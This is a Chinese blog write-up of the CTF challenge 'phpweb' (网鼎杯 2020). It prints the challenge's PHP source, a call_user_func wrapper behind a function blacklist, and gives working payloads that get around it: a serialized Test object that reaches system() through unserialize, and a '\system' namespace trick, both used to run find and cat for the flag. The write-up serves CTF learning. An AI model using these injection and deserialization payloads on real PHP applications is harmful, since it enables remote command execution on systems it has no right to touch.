现在位置: 首页 / ctf / 正文

[网鼎杯 2020 朱雀组]phpweb

  • swq
  • ctf
  • 2024-01-22
  • 633热度
  • 0评论

先发现他的页面一直刷新,时间也一直刷新,有点眼熟.

先抓包看看,发现post参数,可能是前面传的是函数,后面是函数的参数

image-20240122183028569

试试其他函数比如MD5()确实执行了

image-20240122183245637

但是在尝试system的时候发现hacking,说明被过滤了,试了passthru()同样也是

image-20240122183429853

这里我们需要查看页面源代码,进行代码审计 在这里我们可以使用多种函数进行查看 例如:file_get_contents、highlight_file() ,show_source()等

file_get_contents(index.php):读取文件的内容.

其他师傅通过func=file_get_contents&p=index.php得到源码 可我却没有,我也不清楚了

image-20240122184340439
<?php
  $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
  function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
          return $result;
      } else {return "";}
  }
  class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
          if ($this->func != "") {
              echo gettime($this->func, $this->p);
          }
      }
  }
  $func = $_REQUEST["func"];
  $p = $_REQUEST["p"];

  if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
          echo gettime($func, $p);
      }else {
          die("Hacker...");
      }
  }
  ?>

代码审计,本关的黑名单还是挺全面的。

方法一:

但咱们可以使用 反序列化 (出题人的本意也应该是这样)

<?php
class Test{
    var $p="ls /";
    var $func="system";
    }
$a=new Test();
echo serialize($a);
?>

构造payload:func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

并没有发现有用的

image-20240122184521609

查看根目录也是没有func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

image-20240122184729120

发现还是没有 falg的信息

system(“find / -name flag”):查找所有文件名匹配flag的文件

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

image-20240122184909370

<?php
class Test
{
  var $func = "system";
  var $p = "cat /tmp/flagoefiu4r93";
}
$a = new Test();
echo serialize($a);

func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}

image-20240122191244785

方法二:

我们要对黑名单进行一个绕过 所以在本关我们可以使用别的方法来达到获取flag的目的

php内的" \ "在做代码执行的时候,会识别特殊字符串,绕过黑名单

func=\system&p=find / -name flag*

image-20240122191632961

func=\system&p=cat /tmp/flagoefiu4r93

image-20240122191722601